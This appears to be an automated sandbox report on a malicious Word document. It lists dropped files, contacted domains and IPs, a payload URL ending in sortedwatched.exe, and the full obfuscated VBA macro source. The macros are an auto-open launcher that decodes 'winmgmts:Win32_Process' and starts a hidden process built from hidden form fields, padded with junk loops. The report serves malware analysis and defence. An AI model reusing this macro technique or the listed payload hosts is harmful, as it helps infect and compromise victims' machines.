                SHA-512:9F580FD296C60BA4758D8907EF7E402F4B875A260C3584596DBC21578FF5003909AA622B9B31CECBF963464CEC769B6C33B4E07EBF9ABC9DFC6A149129BCBD1F
                Malicious:false
                Preview:[doc]..Nuovo_documento_2019.09.20.LNK=0..[folders]..Nuovo_documento_2019.09.20.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):162
                Entropy (8bit):2.206542077975962
                Encrypted:false
                MD5:D00AF25948EE6C7F7AB78C2C16AACD3B
                SHA1:A02DBBFB4A5627CA061BD0608815F6288263C282
                SHA-256:63B8414CA7924A8ADAD92175E7EB163CB257401701D09AF07C97AC32EA454065
                SHA-512:BCD94B474CBB43776EB0CFFBA9578801DFE65254F613C8172352CD2E0FB702835899E4BB285E8C512823C9DAADD970567B921D22DD1F728F236FB4D7EB48BD3C
                Malicious:false
                Preview:.user.............................................l.u.k.e.t.a.y.l.o.r.....Uf.........$...".g..................................................>.........p.D.
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\728H4QLN5MVJAX6C10J2.temp
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Size (bytes):8016
                Entropy (8bit):3.5568338840501657
                Encrypted:false
                MD5:CE852F8A187F08975F76875C4837AC96
                SHA1:44E5086B25B75B5480960D5F50600CB801E787A0
                SHA-256:627822DA4BBD61056220812CABE1C9AC0F8FA9257E19ED615E5C2C59E99C475E
                SHA-512:C06800C83BD0B3918735BDE5686960B9EB89178DC9CBBE1EA2C202EBABC12CB5B2B93AB24706F14502C11873FCF4DFE965AD0937F3B46A906B628D62CCE491FE
                Malicious:false
                Preview:...................................FL..................F.".. ....b..>...#...>...#...>...k............................P.O. .:i.....+00.../C:\...................\.1.....lF.R. PROGRA~2..D.......:..lF.R*.........................P.r.o.g.r.a.m.D.a.t.a.....X.1......H]:. MICROS~1..@.......:...H]:*.........................M.i.c.r.o.s.o.f.t.....R.1.....M>O@. Windows.<.......:..M>O@*...(.....................W.i.n.d.o.w.s.......1.....~F\O..STARTM~1..j.......:..~F\O*...2...............@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......I.k..Programs..f.......:...I.k*...3...............<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1......I.h..ACCESS~1..l.......:..M>Z@*...4...............B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:.%..WINDOW~1..R.......:.&.:.%*...8.....................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:.& .WINDOW~1.LNK..Z.......:.&.:.&*....)....................W.i.n.d.o.w.s.
                C:\Users\user\Desktop\~$ovo_documento_2019.09.20.doc
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):162
                Entropy (8bit):2.206542077975962
                Encrypted:false
                MD5:D00AF25948EE6C7F7AB78C2C16AACD3B
                SHA1:A02DBBFB4A5627CA061BD0608815F6288263C282
                SHA-256:63B8414CA7924A8ADAD92175E7EB163CB257401701D09AF07C97AC32EA454065
                SHA-512:BCD94B474CBB43776EB0CFFBA9578801DFE65254F613C8172352CD2E0FB702835899E4BB285E8C512823C9DAADD970567B921D22DD1F728F236FB4D7EB48BD3C
                Malicious:false
                Preview:.user.............................................l.u.k.e.t.a.y.l.o.r.....Uf.........$...".g..................................................>.........p.D.

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                sabiosdelamor.co
                		198.49.65.242
                		truefalseunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://181.164.8.25/attrib/schema/pdf/merge/sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://181.164.8.25/attrib/schema/pdf/merge/nsortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPCountryFlagASNASN NameMalicious
                149.167.86.174
                		Australia
                		45510unknownfalse
                198.49.65.242
                		United States
                		33182unknownfalse
                181.164.8.25
                		Argentina
                		10318unknownfalse

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Joseph Fritsch, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Sep 20 08:30:00 2019, Last Saved Time/Date: Fri Sep 20 08:30:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
                Entropy (8bit):6.7270076216244306
                TrID:
                • Microsoft Word document (32009/1) 52.89%
                • Microsoft Word document (old ver.) (19008/1) 31.41%
                • Generic OLE2 / Multistream Compound File (8008/1) 13.23%
                • Java Script embedded in Visual Basic Script (1500/0) 2.48%
                File name:Nuovo_documento_2019.09.20.doc
                File size:236544
                MD5:1b9714114ff735277c8981c84d4f2393
                SHA1:beacaf09fb062e5f3e986ee294ed5ec97fc26c12
                SHA256:beb82d8b2429911fffe39457bd4bb8bbe033ca34826df10b291fa74b33c7275a
                SHA512:49f4a4e8de51483e8f5500e42be792bec9e26d5e583d88011d9dc732a5a504adb4ac34cccf2d3382b802d871acf038063cc850031c2ae910b55413d2a2358070
                SSDEEP:6144:+d96T4Rci2R9JtXvIj++PWVI1dGLkIV7NSU4jJntATfDDBpp:+d96T4Rci2R9JtXvH+PWVI1SXV7NSU4+
                File Content Preview:........................>......................................................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "Nuovo_documento_2019.09.20.doc"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Office Word
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:True
                Flash Objects Count:0
                Contains VBA Macros:True

                Summary

                Code Page:1252
                Title:
                Subject:
                Author:Joseph Fritsch
                Keywords:
                Comments:
                Template:Normal.dotm
                Last Saved By:
                Revion Number:1
                Total Edit Time:0
                Create Time:2019-09-20 07:30:00
                Last Saved Time:2019-09-20 07:30:00
                Number of Pages:1
                Number of Words:95
                Number of Characters:547
                Creating Application:Microsoft Office Word
                Security:0

                Document Summary

                Document Code Page:1252
                Number of Lines:4
                Number of Paragraphs:1
                Thumbnail Scaling Desired:False
                Company:
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:1048576

                Streams with VBA

                VBA File Name: JIodCjfv.bas, Stream Size: 5179
                General
                Stream Path:Macros/VBA/JIodCjfv
                VBA File Name:JIodCjfv.bas
                Stream Size:5179
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . . . . . . . . . _ 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 01 00 00 f0 00 00 00 94 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 9b 02 00 00 43 0d 00 00 00 00 00 00 01 00 00 00 5f 31 c5 db 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                CDate(uDNHZRDB)
                Fix(fIDOjLzQ)
                Until
                EnzDZGz
                Resume
                CStr(rbJdmEz))
                whapPJb
                FnLI_N
                OuoioTjO
                qcOQjrD
                CStr(ruLzmW))
                CStr(uJwlJz))
                YGuUZX
                RecentFiles.Count
                CDHkaIfU
                (ATaMOL
                Sin(WrztcmHX)
                (HZGOlw
                MLzjlI
                DtWubh
                jQhhhQSc
                uNL_Qm
                CStr(NWWiIQQi))
                EhPXLwZr
                zaBTww
                Sin(dOmmAiqP)
                oSsOXl
                FIHNkM
                CStr(bQrbmIrJ)
                ZfdJRPiY
                FJHJlhv
                CDate(OkzDrVT)
                Fix(mwv_hRR)
                Error
                sRRzpU
                dYFvGWI
                mzTRZThP
                oihAvpA
                Attribute
                autoopen()
                DkkCTnu
                oPMvTw
                VB_Name
                "JIodCjfv"
                Function
                Iofqhj
                OObwzR
                cCsukAJS
                wqLToroz
                FnZwmD_A
                CKCNjv
                qNXwDA
                rkbEFdX
                FXnzwzC
                sNGNZi
                AuOCYR
                hUPJJL
                YcqUOCsQ
                kULEiwf
                VBA Code
                Attribute VB_Name = "JIodCjfv"
Sub autoopen()
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If wqLToroz = Na5naWHG Then
         PhaBus1_ = Tan(1141)
      End If
         qNXwDA = ol1JHUw * CDate(tHW47ffa) / Hj82oV / CDHkaIfU + (HZGOlw / CStr(EO5s3Wov) / 3 * CStr(ruLzmW))
      For Each oSsOXl In NAJ70I4
         OEVLv8 = Xfh3Uz - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(ZBpK33S) - 6977 - EnmJEs2 - RRZ6BWC * Sin(Frj8OZbd)
      Next
Loop Until fXaz2u = D5Yzqc
If RecentFiles.Count > 3 Then
dztj37
End If
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If whapPJb = ow8oQWti Then
         cc6fSzI = Tan(1141)
      End If
         nI9cqO = YcqUOCsQ * CDate(OkzDrVT) / CBH1HB / mzTRZThP + (ATaMOL / CStr(bQrbmIrJ) / 3 * CStr(SnjS4W9c))
      For Each sRRzpU In i2w7lPf
         QMKkQZu4 = lbDPzY6 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(w3wS1B) - 6977 - zaBTww - Mntl4i7 * Sin(dOmmAiqP)
      Next
Loop Until Fi6Vjz = XZJ7qqlh
End Sub
Function R3tnEz2D()
ZfdJRPiY = kULEiwf + DAbbE9mG
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If f1ocqu = wZfG2P Then
         EE3NY5nB = Tan(1141)
      End If
         jQhhhQSc = DtWubh * CDate(NdN1rET) / NosNmj4 / kZ3OzYB + (TtIw36Hv / CStr(pkcNH7C) / 3 * CStr(rbJdmEz))
      For Each BpzwCL7 In ZwwF3I
         oPMvTw = qcOQjrD - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(mwv_hRR) - 6977 - cCsukAJS - T4t4PSN * Sin(WrztcmHX)
      Next
Loop Until N06UkOi = sNGNZi
Set R3tnEz2D = CreateObject(lTzGN9z + UMvDUH(ThisDocument.QFa7Tzv) + RI34Jc)
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If ZD4NzNKp = dYFvGWI Then
         FIHNkM = Tan(1141)
      End If
         Jd7zMAU_ = OObwzR * CDate(EIw3Db08) / T1TAVR_L / SXvvII2T + (S1hkHVH / CStr(a1QujnI) / 3 * CStr(uJwlJz))
      For Each TCu6kpE7 In Pt5_Krw
         FnLI_N = mjvrs8a - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(df7KLz) - 6977 - rLX5_E - qhEL6us * Sin(RWp2lz)
      Next
Loop Until DHQs26 = CKCNjv
R3tnEz2D.ShowWindow! = ZfdJRPiY
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If hUPJJL = oihAvpA Then
         CCj5oD = Tan(1141)
      End If
         YGuUZX = DkkCTnu * CDate(mQZoi014) / uNL_Qm / EhPXLwZr + (fzbTzG6 / CStr(T6H6cL) / 3 * CStr(U4kTbL8o))
      For Each SFnP24Y In rkbEFdX
         wnwME5Aw = Iofqhj - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(fIDOjLzQ) - 6977 - qf2EbLqm - AuOCYR * Sin(R65fhvwm)
      Next
Loop Until FnZwmD_A = KUA7zY
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If ls9iOFd = EnzDZGz Then
         iYU6MXV = Tan(1141)
      End If
         JK1i0j = AtZoc6 * CDate(uDNHZRDB) / MLzjlI / OuoioTjO + (h0IdWK / CStr(Gtz6Hz) / 3 * CStr(NWWiIQQi))
      For Each FWa6lK In S10zzpNS
         FXnzwzC = j7Ysl2IC - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(LInuIc64) - 6977 - jR1PlbP - cn3bSi * Sin(GY7qmRZw)
      Next
Loop Until hfW56jn = FJHJlhv
End Function
                VBA File Name: ThisDocument.cls, Stream Size: 3527
                General
                Stream Path:Macros/VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:3527
                Data ASCII:. . . . . . . . . # . . . . . . . . . . . j . . . h . . . . . . . . . . . . . . . _ 1 } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . % . . G . . . . D . . . . . . . . . . O . P . . # . z Q . . . . . . . . . . . . . . . . . . . . T . . $ . . \\ H . Y 2 . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . F i k b d Q Z , 0 , 0 , M S F o r m s , T e x t B o x . N 2 S p O i I D , 1 , 1 , M S F o r m s , T e x t B
                Data Raw:01 16 01 00 06 a5 03 00 00 23 0a 00 00 89 03 00 00 b7 04 00 00 6a 0a 00 00 68 0b 00 00 bc 0b 00 00 00 00 00 00 01 00 00 00 5f 31 7d ae 00 00 ff ff e3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff dc 00 ff ff 00 00 bf 39 1c df 25 d0 fd 47 8a 89 89 94 44 c4 cb f0 d6 d9 13 8d da a9 01 4f 90 50 92 d0 23 07 7a 51 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                "FikbdQZ,
                VB_Name
                VB_Creatable
                "hjjzVw,
                VB_Exposed
                TextBox"
                "uXSvzY,
                VB_Customizable
                "ThisDocument"
                VB_Control
                VB_TemplateDerived
                MSForms,
                False
                "GoWsRhk,
                Attribute
                "zJWspwz,
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                "cZDuVz,
                "qijkYG,
                VBA Code
                Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "FikbdQZ, 0, 0, MSForms, TextBox"
Attribute VB_Control = "N2SpOiID, 1, 1, MSForms, TextBox"
Attribute VB_Control = "mwXI7m, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P83AcXTu, 3, 3, MSForms, TextBox"
Attribute VB_Control = "QFa7Tzv, 4, 4, MSForms, TextBox"
Attribute VB_Control = "TCRM9sqj, 5, 5, MSForms, TextBox"
Attribute VB_Control = "VEYjp2, 6, 6, MSForms, TextBox"
Attribute VB_Control = "VHfL_K2S, 7, 7, MSForms, TextBox"
Attribute VB_Control = "w6kwiq, 8, 8, MSForms, TextBox"
Attribute VB_Control = "hjjzVw, 9, 9, MSForms, TextBox"
Attribute VB_Control = "cZDuVz, 10, 10, MSForms, TextBox"
Attribute VB_Control = "JSEp1Hh, 11, 11, MSForms, TextBox"
Attribute VB_Control = "uXSvzY, 12, 12, MSForms, TextBox"
Attribute VB_Control = "GoWsRhk, 13, 13, MSForms, TextBox"
Attribute VB_Control = "zJWspwz, 14, 14, MSForms, TextBox"
Attribute VB_Control = "kE4iQQr, 15, 15, MSForms, TextBox"
Attribute VB_Control = "TRF9Wz, 16, 16, MSForms, TextBox"
Attribute VB_Control = "qijkYG, 17, 17, MSForms, TextBox"
Attribute VB_Control = "btn5hVS, 18, 18, MSForms, TextBox"
Attribute VB_Control = "GUl0LE, 19, 19, MSForms, TextBox"
                VBA File Name: snLF1V.bas, Stream Size: 5388
                General
                Stream Path:Macros/VBA/snLF1V
                VBA File Name:snLF1V.bas
                Stream Size:5388
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 01 00 00 f0 00 00 00 bc 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff c3 02 00 00 db 0d 00 00 00 00 00 00 01 00 00 00 5f 31 e8 9a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                XzsVHACu
                aGJjAH
                Until
                Resume
                mWYlNTFO
                wDZDIUTV
                MAPHFj
                tcDLLb
                YAHvQ_
                Sin(CmXBWjb)
                YjRQrq
                zQkMRi
                UMvDUH(jNQUnno)
                ZNRIEN
                UMvDUH
                Fix(FRqJIU)
                huhEoJG
                EqHGmqzs
                CDate(fCMUHn)
                WiwqHbr
                CStr(GdQwslU)
                JSjBjs
                zcazMGDf
                MSfBRT
                ojvDCQi
                WLAEkzsu
                Sin(cISYkJs)
                wMBYtY
                nkfcdqD
                HnhIwa
                (pSZQnNn
                Replace(jNQUnno,
                UPMZSQ
                HpAvVal
                Sin(mjjrHIf)
                Error
                Attribute
                HV_KNz
                jMCQik
                dpjKqtAS
                VB_Name
                tqXjFCw
                PFAGKSc
                CStr(FfJUME)
                Function
                m_MLhXX
                rZcdZKRX
                busmGEX
                wWOoNnTo
                diSWXniz
                CDate(lsaWRUr)
                UMvDUH(ThisDocument.zJWspwz
                pUBdAcb
                cLEAWn
                CStr(uBRAVT))
                CStr(wlzHbq))
                Fix(jYQWvaN)
                ZKnIZEfd,
                VBA Code
                Attribute VB_Name = "snLF1V"
Function dztj37()
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If M3oCwG = PFAGKSc Then
         HnhIwa = Tan(1141)
      End If
         R6wTtT = Btc0KuW * CDate(fCMUHn) / pUBdAcb / WLAEkzsu + (z5_aQ54 / CStr(q2NS516) / 3 * CStr(uBRAVT))
      For Each jMCQik In tkw6vj
         CzAN5H = oc2GT0i - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(FRqJIU) - 6977 - MAPHFj - A9hSFQf9 * Sin(Bt4u6CG)
      Next
Loop Until PcG7it_ = zir7hM
kMmT3s = vq219c + UMvDUH(ThisDocument.zJWspwz + ThisDocument.VHfL_K2S) + YAHvQ_
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If LXv84MXp = JSjBjs Then
         rZcdZKRX = Tan(1141)
      End If
         wD6C32mJ = TAw0Fzm * CDate(C0DzNIbd) / dpjKqtAS / iaXsMY1 + (TniCd0t / CStr(k5bY2L) / 3 * CStr(t1HQFfiz))
      For Each fVn1T1_ In BnCM82w
         zQkMRi = ZNRIEN - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(Ghn4llZ) - 6977 - UF1nKaU6 - wDZDIUTV * Sin(L8Zz21)
      Next
Loop Until lnY3HW = jXUw9Oz

CreateObject(UMvDUH("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3")).Create kMmT3s, ZKnIZEfd, R3tnEz2D, khjUo3du
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If wWOoNnTo = MSfBRT Then
         QvB9VD = Tan(1141)
      End If
         z8FYLah = z5liGH * CDate(TuYSA6) / KWit9B / tqXjFCw + (pSZQnNn / CStr(wT5D9BcE) / 3 * CStr(wMR9tP))
      For Each mjHV7os In LDjJ6zM
         XzsVHACu = bUqA9z5 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(jYQWvaN) - 6977 - vDZE63w - UYGTL2Tr * Sin(CmXBWjb)
      Next
Loop Until X975_m = zcazMGDf

   On Error Resume Next
   Set mna = xqmm6672
   Do
      If Pu1R8IUO = aXF2_4qQ Then
         EaYS6RQw = Tan(1141)
      End If
         nkfcdqD = tcDLLb * CDate(lsaWRUr) / ShWp3jNB / tnXUzJ0O + (MM3V6h / CStr(GdQwslU) / 3 * CStr(j_72KM))
      For Each mWYlNTFO In HpAvVal
         iE7w_S0 = cLEAWn - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(lA6KKk) - 6977 - J3J3pfPR - hzkYTP82 * Sin(cISYkJs)
      Next
Loop Until Sff8wzaz = B8wUj_W
End Function
Function UMvDUH(jNQUnno)
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If CP2pOzYD = m_MLhXX Then
         UPMZSQ = Tan(1141)
      End If
         busmGEX = huhEoJG * CDate(az_UGd0) / a21jZbL3 / pn7zEK + (N0vGGku / CStr(fMoOoWO3) / 3 * CStr(EUG4z12))
      For Each d_7JYztz In nP1obkp
         HRs8wo = HG0RQi - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(zqDQZ7) - 6977 - YjRQrq - Hz5p3D * Sin(mjjrHIf)
      Next
Loop Until Xb5lam = diSWXniz
UMvDUH = Replace(jNQUnno, Replace("09NhI09NhuH09Nh309Nh", "09Nh", ""), "")
   On Error Resume Next
   Set mna = xqmm6672
   Do
      If wMBYtY = O_vT8j Then
         mEczi1 = Tan(1141)
      End If
         ViXQd2j8 = EqHGmqzs * CDate(p2VQvUjT) / nJES0LA / WiwqHbr + (XzCzPS7 / CStr(FfJUME) / 3 * CStr(wlzHbq))
      For Each HV_KNz In t3Fh05z
         w5XZFSu = aGJjAH - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(F97Z_Sb) - 6977 - Q0hGCzd - ojvDCQi * Sin(wNX30a)
      Next
Loop Until qaB0m7mo = E9cRqzhV
End Function

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:114
                Entropy:4.2359563651
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:280
                Entropy:2.41598942003
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 416
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:416
                Entropy:3.20037592743
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 70 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 58 01 00 00 05 00 00 00 b0 00 00 00 06 00 00 00 bc 00 00 00 07 00 00 00 c8 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 e8 00 00 00
                Stream Path: 1Table, File Type: data, Stream Size: 8131
                General
                Stream Path:1Table
                File Type:data
                Stream Size:8131
                Entropy:5.68194048366
                Base64 Encoded:True
                Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                Data Raw:1e 06 11 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                Stream Path: Data, File Type: data, Stream Size: 148800
                General
                Stream Path:Data
                File Type:data
                Stream Size:148800
                Entropy:7.4746505717
                Base64 Encoded:True
                Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . R . . . . . . . c . . . $ . . . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . ? . . . . . 3 . " . . . . . . . . . ` . . . . . . . ? . . . . . . . . . . . . . . . . . 2 . . . U . . . . . V L . . . . . . k . . v . . . } . . 1 . . . . . . . D . . . . . k . ` ! . . ) . . . V L . . . . . . k . . v . . . } . . . . . . . . . . . . . .
                Data Raw:0b 02 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0f 00 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 62 00 00 00 b2 04 0a f0 08 00 00 00 52 04 00 00 00 0a 00 00 63 00 0b f0 24 00 00 00 7f 00 80 00 80 00 04 41 15 00 00 00 3f 01 00 00 06 00 bf 01 0c 00 1f 00 ff 01 00 00
                Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 589
                General
                Stream Path:Macros/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:589
                Entropy:5.38649124242
                Base64 Encoded:True
